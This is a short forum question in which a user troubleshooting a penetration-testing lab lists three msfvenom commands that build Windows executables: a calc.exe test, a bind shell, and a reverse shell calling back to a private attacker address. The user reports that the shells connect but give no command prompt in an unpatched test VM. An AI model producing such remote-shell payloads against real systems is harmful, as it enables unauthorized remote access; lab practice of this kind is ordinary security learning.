AnsweredAssumed Answered

Windows Payload issues

Question asked by Keith Rozario on Apr 3, 2017
Latest reply on Aug 8, 2017 by Bert van Montfort

I've having some problems with my payloads.

 

I used msfvenom to generate the following payloads:

  1. msfvenom -a x86 -p windows/exec CMD=calc.exe -f exe > testcalc-windows-exec.exe
  2. msfvenom -p windows/shell/bind_tcp -f exe > windows-bind-tcp-4444.exe
  3. msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.187 LPORT=4000 -f exe > test-win-shell-reverse.exe

 

I place all 3 exe files into a windows 7 (unpatched) virtual machine--with no AV or Firewall.

 

(1) works perfectly fine, and calc.exe launches. Good.

 

(2) creates an open port, but when I login I don't get a shell (am I missing a parameter to bind to cmd or shell?) BAD.

 

(3) The 'attacked' computer calls back the attacking computer on 192.168.0.187, (i.e. I can see something connect to my listening ncat port, but nothing else). I can't seem to get a reverse shell---just a reverse connect, and nothing else. BAD.

 

am I missing something in (2) and (3), I want to run native shells first before proceeding to metepreter etc.

Outcomes